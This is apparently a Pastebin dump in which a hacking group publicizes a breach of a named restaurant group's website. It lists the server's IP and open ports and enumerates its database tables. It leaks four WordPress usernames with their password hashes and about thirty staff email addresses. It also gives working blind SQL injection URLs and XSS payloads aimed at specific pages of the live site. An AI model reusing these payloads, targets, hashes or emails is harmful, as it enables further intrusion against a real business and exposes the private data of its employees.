Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /$$ /$$ /$$$$$$$$ /$$$$$$
- | $$ | $$|__ $$__//$$__ $$
- | $$ | $$ | $$ | $$ \__/ /$$$$$$$$
- | $$$$$$$$ | $$ | $$ /$$$$|____ /$$/
- | $$ | $$ | $$ | $$ \ $$ /$$__/
- | $$__ $$ | $$ | $$|_ $$ /$$$$/
- | $$ | $$ | $$ | $$ \ $$ /$$__/
- | $$ | $$ | $$ | $$$$$$/ /$$$$$$$$
- |__/ |__/ |__/ \______/ |________/
- /$$$$$$ /$$$$$$ /$$$$$$
- |_ $$_/ /$$__ $$ /$$__ $$
- | $$ | $$ \__/ | $$ \ $$
- | $$ | $$$$$$ | $$$$$$$$
- | $$ \____ $$ | $$__ $$
- | $$ /$$ \ $$ | $$ | $$
- /$$$$$$| $$$$$$/ | $$ | $$
- |______/ \______/ |__/ |__/
- /$$$$$$ /$$$$$$ /$$$$$$$
- /$$__ $$ /$$__ $$| $$__ $$
- | $$ \__/| $$ \ $$| $$ \ $$
- | $$ /$$$$| $$ | $$| $$ | $$
- | $$|_ $$| $$ | $$| $$ | $$
- | $$|_ $$| $$ | $$| $$ | $$
- | $$ \ $$| $$ | $$| $$ | $$
- | $$$$$$/| $$$$$$/| $$$$$$$/
- \______/ \______/ |_______/
- Twitter @HTGzSecurity
- Facebook https://www.facebook.com/An0nBlank
- HTGz Security
- ~ By HTGz Security
- #Operation HTGz Security
- ++++++++++++++++++++++++++
- *==================================================================================================*
- | Domain: http://www.maxrestaurantgroup.com/ |
- | Server: Apache |
- | IP: 70.166.50.25 |
- |open port 110/tcp on 70.166.50.25 |
- |open port 443/tcp on 70.166.50.25 |
- |open port 143/tcp on 70.166.50.25 |
- |open port 21/tcp on 70.166.50.25 |
- |open port 587/tcp on 70.166.50.25 |
- |open port 80/tcp on 70.166.50.25 |
- |open port 10025/tcp smtp qmail smtpd |
- |8443/tcp open http Apache httpd |
- *==================================================================================================*
- | MD5: f417 9f2f 34a4 7a64 10bb 4ad5 84f4 7a13
- |_SHA-1: 494d bead 0570 32bc fca1 b0d9 57f0 8759 1020 c95c
- ==========================================================
- | MD5: bb3e 1f05 cbd2 936c f532 a72b fd15 c94e
- |_SHA-1: 55d8 ef58 302d f696 e170 848f 6a3e 76f2 76de 40cc
- ==========================================================
- | MD5: fa94 49b1 1b56 4bd1 368b 415f 58d6 1e56
- |_SHA-1: a1e9 745b 76b5 5926 a34b 0790 2f48 7a66 55ea 8457
- http://www.maxrestaurantgroup.com
- [200] ActiveX[Flash-ActiveX][D27CDB6E-AE6D-11cf-96B8-444553540000],
- Adobe-Flash, Apache[2.x],
- Country[UNITED STATES][US],
- HTTPServer[Apache],
- IP[70.166.50.25],
- JQuery, Object["application/x-shockwave-flash]["clsid:D27CDB6E-AE6D-11cf-96B8-444553540000], Script[text/javascript], Title[Welcome to the Max Restaurant Group]
- databases (2)
- information_schema
- maxdiningcard
- Database:maxdiningcard
- (76 tables)
- *===========================*
- | RecordLocks |
- | RecycleBin |
- | RecycleBinTechSupport |
- | categories_12-08-2011 |
- | orders_01-11-2012 |
- | orders_05-17-2012 |
- | orders_backup-07-14-2011 |
- | orders_backup-07-15-2011 |
- | calendar |
- | calendar_events_locations |
- | calendar_images_videos |
- | categories |
- | categories2 |
- | coupon_customers |
- | coupons |
- | coupons_customers |
- | customers |
- | documents |
- | emails |
- | grouping_general |
- | hits |
- | hits_clean |
- | ipbans |
- | jobs |
- | locations |
- | max__shipopt |
- | max_albums |
- | max_blogposts |
- | max_blogusers |
- | max_categories |
- | max_customers |
- | max_emails |
- | max_galleries |
- | max_gallerygroups |
- | max_optionitems |
- | max_optionproducts |
- | max_options |
- | max_optionsproducts |
- | max_orders |
- | max_photos |
- | max_products |
- | max_products_sold |
- | max_promocodes |
- | max_subcategories |
- | max_watermarks |
- | menu |
- | menu2 |
- | orders |
- | orders_TEMP |
- | pdfs |
- | people |
- | phoneorders |
- | pressreleases |
- | products |
- | products_discounts |
- | products_htmlemails |
- | recipes |
- | resumes |
- | reviews |
- | temp_orders |
- | temp_redem_orders |
- | thecooper_registrations |
- | votes |
- | websiteusers |
- | wp_ak_twitter |
- | wp_commentmeta |
- | wp_comments |
- | wp_links |
- | wp_options |
- | wp_postmeta |
- | wp_posts |
- | wp_term_relationships |
- | wp_term_taxonomy |
- | wp_terms |
- | wp_usermeta |
- | wp_users |
- *===========================*
- Database:maxdiningcard
- Table:RecycleBin
- *============*
- | Column |
- *============*
- | timestamp |
- | companyid |
- | data |
- | id |
- | identifier |
- | tablename |
- *============*
- Database:maxdiningcard
- Table:emails
- (5 columns)
- *============*
- | Column |
- *============*
- | active |
- | companyid |
- | email |
- | id |
- | name |
- *============*
- Database:maxdiningcard
- Table:max_emails
- (6 columns)
- *===========*
- | Column |
- *===========*
- | date |
- | email |
- | emailfrom |
- | emailto |
- | id |
- | subject |
- *===========*
- Database:maxdiningcard
- Table:wp_users
- (10 columns)
- *=====================*
- | Column |
- *=====================*
- | display_name |
- | ID |
- | user_activation_key |
- | user_email |
- | user_login |
- | user_nicename |
- | user_pass |
- | user_registered |
- | user_status |
- | user_url |
- *=====================*
- Database:maxdiningcard
- Table:wp_users
- (4 entries)
- *============*
- | user_login |
- *============*
- | bmitchell |
- | bobbyv |
- | lmahon |
- | newwave |
- *============*
- Database:maxdiningcard
- Table:wp_users
- (4 entries)
- *====================================*
- | user_pass |
- *====================================*
- | $P$B7eMCaH6dU4xxK1rDtKKCua/gjA2qa. |
- | $P$BBfY8gLO86CwH8hq7o0XKkve68ShVL1 |
- | $P$BslJtgL90o1DXwqh7Ak7lIdN3AZxmB1 |
- | $P$BVww4bE3tbNGZ/bhMsW2aXoJe4SrtB0 |
- *====================================*
- Emails:
- Email ssmith@maxsoysterbar.com
- Email dkelly@maxburgerct.com
- Email ssmith@maxtavern.com
- Email bcooke@maxsoysterbar.com
- Email smichalewicz@mrgct.com
- Email sharbeclincoln@mrgct.com
- Email tdoupence@arthritis.org
- Email ssmith@maxburgerct.com
- Email dmascolo@trumbullkitchen.com
- Email msnook@mrgct.com
- Email bkarsky@maxamiaristorante.com
- Email bkohnstam@maxamore.com
- Email ssmith@maxdowntown.com
- Email apurcell@maxsoysterbar.com
- Email ssmith@maxamore.com
- Email agabriele@maxdowntown.com
- Email ssmith@trumbullkitchen.com
- Email jobs@maxrestaurantgroup.com
- Email mconley@maxamore.com
- Email ssmith@maxamiaristorante.com
- Email mconley@maxfishct.com
- Email maxcares@mrgct.com
- Email wpenenori@thecooperrestaurant.com
- Email ttaillifer@mrgct.com
- Email aconstable@mrgct.com
- Email ttaillefer@mrgct.com
- Email smiller@mrgct.com
- Email abombard@mrgct.com
- Email bcosta@maxfishct.com
- Email dtoupence@arthritis.org
- Email aconstable@maxrestaurantgroup.com
- Email maxmail@mrgct.com
- Email dkinoshita@maxtavern.com
- -------------------------------------------------------------------------------------------------------------------------------------------------
- Blind SQL Injection
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amia/staff.php?id=4'+AND+'1'='1
- | Keyword: introduction
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/downtown/staff.php?id=2'+AND+'1'='1
- | Keyword: Steven
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/oyster/staff.php?id=3'+AND+'1'='1
- | Keyword: developed
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/trumbull/staff.php?id=5'+AND+'1'='1
- | Keyword: Partner
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=6'+AND+'1'='1
- | Keyword: native
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/tavern/staff.php?id=18'+AND+'1'='1
- | Keyword: General
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/fish/staff.php?id=22'+AND+'1'='1
- | Keyword: Managing
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=20'+AND+'1'='1
- | Keyword: Managing
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/fish/staff.php?id=26'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=95+AND+1=1
- | Keyword: Valley
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=102+AND+1=1
- | Keyword: orders
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=35+AND+1=1
- | Keyword: Restaurant
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=92+AND+1=1
- | Keyword: Downtown
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=94+AND+1=1
- | Keyword: Downtown
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=93+AND+1=1
- | Keyword: Restaurant
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amia/staff.php?id=30'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=23'+AND+'1'='1
- | Keyword: General
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=11'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/trumbull/staff.php?id=24'+AND+'1'='1
- | Keyword: General
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/downtown/staff.php?id=32'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/oyster/staff.php?id=7'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/tavern/staff.php?id=29'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=33'+AND+'1'='1
- | Keyword: McKenzie
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=31'+AND+'1'='1
- |Keyword: General
- -------------------------------------------------------------------------------------------------------------------------------------------------
- -------------------------------------------------------------------------------------------------------------------------------------------------
- | Cross-Site Scripting (XSS)
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<script>alert('XSS')</script>&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<IMG SRC="javascript:alert('XSS');">&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<body onload="javascript:alert('XSS')"></body>&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<table background="javascript:alert('XSS')"></table>&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<script>alert('XSS')</script>
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<IMG SRC="javascript:alert('XSS');">
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- | Vul (XSS)] http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<body onload="javascript:alert('XSS')"></body>
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<table background="javascript:alert('XSS')"></table>
- -------------------------------------------------------------------------------------------------------------------------------------------------
- SF:B0,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAM
- SF:ESPACE\x20THREAD=ORDEREDSUBJECT\x20THREAD=REFERENCES\x20SORT\x20QUOTA\x
- SF:20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=
- SF:UNION\x20STARTTLS\]\r\n")%r(GetRequest,112,"\*\x20OK\x20\[CAPABILITY\x2
- SF:0IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAMESPACE\x20THREAD=ORDEREDSUBJECT
- SF:\x20THREAD=REFERENCES\x20SORT\x20QUOTA\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SH
- SF:A1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=UNION\x20STARTTLS\]\r\nGET\x20N
- SF:O\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n\*
- SF:\x20NO\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\
- SF:r\n")%r(GenericLines,110,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20UIDP
- SF:LUS\x20CHILDREN\x20NAMESPACE\x20THREAD=ORDEREDSUBJECT\x20THREAD=REFEREN
- SF:CES\x20SORT\x20QUOTA\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x
- SF:20IDLE\x20ACL\x20ACL2=UNION\x20STARTTLS\]\r\n\*\x20NO\x20Error\x20in\x2
- SF:0IMAP\x20command\x20received\x20by\x20server\.\r\n\*\x20NO\x20Error\x20
- SF:in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n")%r(HTTPOptions
- SF:,116,"\*\x20OK\x20\[CAPABILITY\x20IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20N
- SF:AMESPACE\x20THREAD=ORDEREDSUBJECT\x20THREAD=REFERENCES\x20SORT\x20QUOTA
- SF:\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL
- SF:2=UNION\x20STARTTLS\]\r\nOPTIONS\x20NO\x20Error\x20in\x20IMAP\x20comman
- SF:d\x20received\x20by\x20server\.\r\n\*\x20NO\x20Error\x20in\x20IMAP\x20c
- SF:ommand\x20received\x20by\x20server\.\r\n")%r(RTSPRequest,116,"\*\x20OK\
- SF:x20\[CAPABILITY\x20IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAMESPACE\x20THR
- SF:EAD=ORDEREDSUBJECT\x20THREAD=REFERENCES\x20SORT\x20QUOTA\x20AUTH=CRAM-M
- SF:D5\x20AUTH=CRAM-SHA1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=UNION\x20STAR
- SF:TTLS\]\r\nOPTIONS\x20NO\x20Error\x20in\x20IMAP\x20command\x20received\x
- SF:20by\x20server\.\r\n\*\x20NO\x20Error\x20in\x20IMAP\x20command\x20recei
- SF:ved\x20by\x20server\.\r\n")%r(RPCCheck,B0,"\*\x20OK\x20\[CAPABILITY\x20
- SF:IMAP4rev1\x20UIDPLUS\x20CHILDREN\x20NAMESPACE\x20THREAD=ORDEREDSUBJECT\
- SF:x20THREAD=REFERENCES\x20SORT\x20QUOTA\x20AUTH=CRAM-MD5\x20AUTH=CRAM-SHA
- SF:1\x20AUTH=PLAIN\x20IDLE\x20ACL\x20ACL2=UNION\x20STARTTLS\]\r\n");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement